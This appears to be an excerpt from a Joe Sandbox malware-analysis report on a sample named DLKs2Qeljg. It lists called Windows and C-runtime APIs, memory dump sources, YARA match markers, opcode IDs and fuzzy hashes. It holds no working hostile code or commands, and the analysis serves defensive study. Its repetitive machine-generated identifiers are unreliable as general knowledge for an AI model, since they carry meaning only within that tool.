                                                                                                        • _free.LIBCMT ref: 0043A3CC
                                                                                                        • _free.LIBCMT ref: 0043A3D7
                                                                                                        • _free.LIBCMT ref: 0043A42B
                                                                                                        • _free.LIBCMT ref: 0043A436
                                                                                                        • _free.LIBCMT ref: 0043A441
                                                                                                        • _free.LIBCMT ref: 0043A44C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                        • Instruction ID: 1a6205ac72ebf8d1688c9f65f809cb8e6d8ac8f7b7a09961daf7fc6283f763b0
                                                                                                        • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                        • Instruction Fuzzy Hash: B6119032980704A7E522BFB2CC07FCB7BAD6F18305F40581EB6DA66052CA2CE5184B47
                                                                                                        APIs
                                                                                                          • Part of subcall function 0215A321: _free.LIBCMT ref: 0215A34A
                                                                                                        • _free.LIBCMT ref: 0215A628
                                                                                                          • Part of subcall function 021536C1: HeapFree.KERNEL32(00000000,00000000,?,0215A34F,?,00000000,?,00000000,?,0215A5F3,?,00000007,?,?,0215A9E7,?), ref: 021536D7
                                                                                                          • Part of subcall function 021536C1: GetLastError.KERNEL32(?,?,0215A34F,?,00000000,?,00000000,?,0215A5F3,?,00000007,?,?,0215A9E7,?,?), ref: 021536E9
                                                                                                        • _free.LIBCMT ref: 0215A633
                                                                                                        • _free.LIBCMT ref: 0215A63E
                                                                                                        • _free.LIBCMT ref: 0215A692
                                                                                                        • _free.LIBCMT ref: 0215A69D
                                                                                                        • _free.LIBCMT ref: 0215A6A8
                                                                                                        • _free.LIBCMT ref: 0215A6B3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                        • Instruction ID: 303020afb8e3fcf10e6324fc34e38439b89f8bb690d0d71d67ba5b090144085d
                                                                                                        • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                        • Instruction Fuzzy Hash: 271184319C0B28FEDA60BBB1CD45FCF77DEDF04700F8009A8AAB9A6160D724B5148E90
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                                                        • _free.LIBCMT ref: 00431F88
                                                                                                        • _free.LIBCMT ref: 00431FAF
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00431FC5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free
                                                                                                        • String ID: H9a
                                                                                                        • API String ID: 3170660625-3053050142
                                                                                                        • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                        • Instruction ID: e50af596af166b8a3d4a0e4732677f958598b7c5f443a1734cc3cd8306247ad3
                                                                                                        • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                        • Instruction Fuzzy Hash: F7014936609A003BD3122B315C45D2B266DABD977AF21212FF805933E2EB2C8902512D
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(0212DACD,0212DACD,00000002,0214ED25,02153941,00000000,?,021469F5,00000002,00000000,00000000,00000000,?,0212CF7E,0212DACD,00000004), ref: 021521BA
                                                                                                        • _free.LIBCMT ref: 021521EF
                                                                                                        • _free.LIBCMT ref: 02152216
                                                                                                        • SetLastError.KERNEL32(00000000,?,0212DACD), ref: 02152223
                                                                                                        • SetLastError.KERNEL32(00000000,?,0212DACD), ref: 0215222C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free
                                                                                                        • String ID: H9a
                                                                                                        • API String ID: 3170660625-3053050142
                                                                                                        • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                        • Instruction ID: 08fe14f531975ada42eecb337f0551e164df23cc8f9d659e52404f7e3fb13bfd
                                                                                                        • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                        • Instruction Fuzzy Hash: E501263B5C1620FF831627246C84E1B265EABC2B72B5101E8FC3592290EB7189058525
                                                                                                        APIs
                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 004123F0
                                                                                                        • GetLastError.KERNEL32 ref: 004123F6
                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412423
                                                                                                        • GetLastError.KERNEL32 ref: 0041242D
                                                                                                        • GetLastError.KERNEL32 ref: 0041243F
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412455
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412463
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                        • String ID:
                                                                                                        • API String ID: 4227777306-0
                                                                                                        • Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                                                        • Instruction ID: 5cfb26a65153cc27f48dfa9c0f225a7cd51ea371121a2632e0d6d729d80d374e
                                                                                                        • Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                                                        • Instruction Fuzzy Hash: 3201F738600121A7C720AF66ED09BEF3768AF42B52BA0443BF905D2151DBACD954866D
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                        • _free.LIBCMT ref: 00431F01
                                                                                                        • _free.LIBCMT ref: 00431F29
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free
                                                                                                        • String ID: H9a
                                                                                                        • API String ID: 3170660625-3053050142
                                                                                                        • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                        • Instruction ID: 142cfc1d6fefe371a65853cee7fca9c099a37b51f1b4623e9e727693a4b19c8f
                                                                                                        • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                        • Instruction Fuzzy Hash: 49F02D3A508A0037D61637266C06B1B2A19AFD9B27F31112FF814D33F2EF2DC802452D
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,0214A9DC,?,00000000,?,0214CDD6,02122474,00000000,?,00451F20), ref: 02152135
                                                                                                        • _free.LIBCMT ref: 02152168
                                                                                                        • _free.LIBCMT ref: 02152190
                                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0215219D
                                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free
                                                                                                        • String ID: H9a
                                                                                                        • API String ID: 3170660625-3053050142
                                                                                                        • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                        • Instruction ID: 317a7be16d5291868b72306e57372156e7e562cbca74e3b7fd47af8b05ebb0b6
                                                                                                        • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                        • Instruction Fuzzy Hash: B6F086375C5620FFD2162724AC44B1B265A5FC1B62F1501A8FD3892290EF7185068569
                                                                                                        APIs
                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 02132657
                                                                                                        • GetLastError.KERNEL32 ref: 0213265D
                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 0213268A
                                                                                                        • GetLastError.KERNEL32 ref: 02132694
                                                                                                        • GetLastError.KERNEL32 ref: 021326A6
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021326BC
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021326CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                        • String ID:
                                                                                                        • API String ID: 4227777306-0
                                                                                                        • Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                                                        • Instruction ID: 667b8b4a85d2461b3592ee72b8df054345df0534d4727c3abe8a139504a62085
                                                                                                        • Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                                                        • Instruction Fuzzy Hash: 2501F7B9580115ABDB25BF62EC48FAF376AAF42B52B500435FC15E3050DB34DD048BE8
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021366FB), ref: 021324A6
                                                                                                        • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021324B4
                                                                                                        • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021324C2
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021366FB), ref: 021324F0
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 021324F7
                                                                                                        • GetLastError.KERNEL32(?,?,?,021366FB), ref: 02132512
                                                                                                        • GetLastError.KERNEL32(?,?,?,021366FB), ref: 0213251E
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132534
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02132542
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                        • String ID: kernel32.dll
                                                                                                        • API String ID: 4179531150-1793498882
                                                                                                        • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                        • Instruction ID: 1c7682ad35bc1c00e56a6d2790e2ad111bde59018b47157ae3f6b0e48bd8fde3
                                                                                                        • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                        • Instruction Fuzzy Hash: D7F0A9769403103FFA123B797D5995A3FADDD46A273200636F811E2291EB75D9008658
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C66D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: <(@$<(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                        • API String ID: 2005118841-859722693
                                                                                                        • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                        • Instruction ID: a061ea616c9574019159ec0f40f66c927ac9cef8fcde5d3cdfefebe65de0f9c0
                                                                                                        • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                        • Instruction Fuzzy Hash: 9FF0FCB2900204AAC714DB54CC42FAB33985B11744F14857BEE11B61C3DA7DAD05C79C
                                                                                                        APIs
                                                                                                          • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0043115C
                                                                                                        • _free.LIBCMT ref: 004311CD
                                                                                                        • _free.LIBCMT ref: 004311E6
                                                                                                        • _free.LIBCMT ref: 00431218
                                                                                                        • _free.LIBCMT ref: 00431221
                                                                                                        • _free.LIBCMT ref: 0043122D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorLast$_memcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275183328-0
                                                                                                        • Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                        • Instruction ID: e2129b0906de41222375811faf8a10f30bb0ce812e5bc895f935e357d1a7b262
                                                                                                        • Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                        • Instruction Fuzzy Hash: BBB12975A012199FDB24DF18C894AAEB7B4FB18304F1086EEE949A7360D775AE90CF44
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021525DC,00000001,00000001,?), ref: 021523E5
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021525DC,00000001,00000001,?,?,?,?), ref: 0215246B
                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02152565
                                                                                                        • __freea.LIBCMT ref: 02152572
                                                                                                          • Part of subcall function 021538FE: RtlAllocateHeap.NTDLL(00000000,0212DACD,00000000), ref: 02153930
                                                                                                        • __freea.LIBCMT ref: 0215257B
                                                                                                        • __freea.LIBCMT ref: 021525A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1414292761-0
                                                                                                        • Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                        • Instruction ID: 50df7a50e4fcee0749e559e594f89a83af09a126a754667b5287d14d87724618
                                                                                                        • Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                        • Instruction Fuzzy Hash: 2F51C273A90226EEDB298F64CC60EBF77AAEB44654F1946A8FD24D6150EB34DC40CA50
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe
                                                                                                        • String ID:
                                                                                                        • API String ID: 4189289331-0
                                                                                                        • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                        • Instruction ID: bb2f2fad6d072167ed5b94e0a9d5adc00c5e69a911ee8ed656fcb3dc3f970734
                                                                                                        • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                        • Instruction Fuzzy Hash: DF510776980205AFDF249F68CC40FAE77AABF49324F544269F82DD6181EF31D5018AA4
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02143041
                                                                                                          • Part of subcall function 02138AA2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02138AAD
                                                                                                        • SafeSQueue.LIBCONCRT ref: 0214305A
                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 0214311A
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0214313B
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02143149
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                        • String ID:
                                                                                                        • API String ID: 3496964030-0
                                                                                                        • Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                        • Instruction ID: bc3829617a3a8f8911780019af7d4f81930e80bc2fd51ab6076e93d00091d402
                                                                                                        • Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                        • Instruction Fuzzy Hash: D931D331A406119FCB29EF65C840BAAB7B6FF44710F2546A9EC1A9B291DF70E845CFC0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                        • String ID:
                                                                                                        • API String ID: 1687354797-0
                                                                                                        • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                        • Instruction ID: 01811984922803fe336ba3cc388dbb5f66320ffcca75ef919892b066dd743b7a
                                                                                                        • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                        • Instruction Fuzzy Hash: 9821A372C84268AEDF15EBB4E840BDDB7FAAF08325F64401AF404B3181DB7499588F65
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,B8F93293), ref: 00428DD8
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DE6
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428DFF
                                                                                                        • SetLastError.KERNEL32(00000000,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,B8F93293), ref: 00428E51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                        • Instruction ID: 758f7159784acd0a18ffe6e4d50e04bfafef725c819603ece3ff961fbf0e5b5e
                                                                                                        • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                        • Instruction Fuzzy Hash: E001F53230A7316EA6242BF57C8966B2744EB0577AB60033FF510902E2EE198C20554D
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,02149028,021469B9,021608F7,00000008,02160C5C,?,?,?,?,02143CA2,?,?,0045A064), ref: 0214903F
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0214904D
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02149066
                                                                                                        • SetLastError.KERNEL32(00000000,?,02149028,021469B9,021608F7,00000008,02160C5C,?,?,?,?,02143CA2,?,?,0045A064), ref: 021490B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                        • Instruction ID: f7ed2d0220fac189a64366cea0bcab9ad00f29e3b2342e0b54fdf1ab03375b98
                                                                                                        • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                        • Instruction Fuzzy Hash: 9001F7321C97116EA7382BF46C98E6B2759EB45776B300339E92C461F0EF5298115989
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00404D59
                                                                                                        • int.LIBCPMT ref: 00404D70
                                                                                                          • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                          • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00404D79
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00404DAA
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DC0
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DDE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 2243866535-0
                                                                                                        • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                        • Instruction ID: 1dda4c75b92fe2b5e69280e9b804bb78dd99b554210e3ff263920cc003329bbf
                                                                                                        • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                        • Instruction Fuzzy Hash: 7A11A3B19001249BCB15EBA0C841AEE77B4AF54319F20053EE912B72D2DB7C9A0587DD
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02124FC0
                                                                                                        • int.LIBCPMT ref: 02124FD7
                                                                                                          • Part of subcall function 0212BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0212BFCA
                                                                                                          • Part of subcall function 0212BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0212BFE4
                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 02124FE0
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02125011
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02125027
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02125045
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 2243866535-0
                                                                                                        • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                        • Instruction ID: 1e61ea8cc0a09886da9e1199e6534a5e45e3028148afe639e34b5523db1b2dbe
                                                                                                        • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                        • Instruction Fuzzy Hash: 5711EC32980238AFCB29EBA4DC40BAD73B2AF44315F500429F815AB2D1DB349A19CF94
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040C190
                                                                                                        • int.LIBCPMT ref: 0040C1A7
                                                                                                          • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                          • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0040C1B0
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040C1E1
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C1F7
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C215
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 2243866535-0
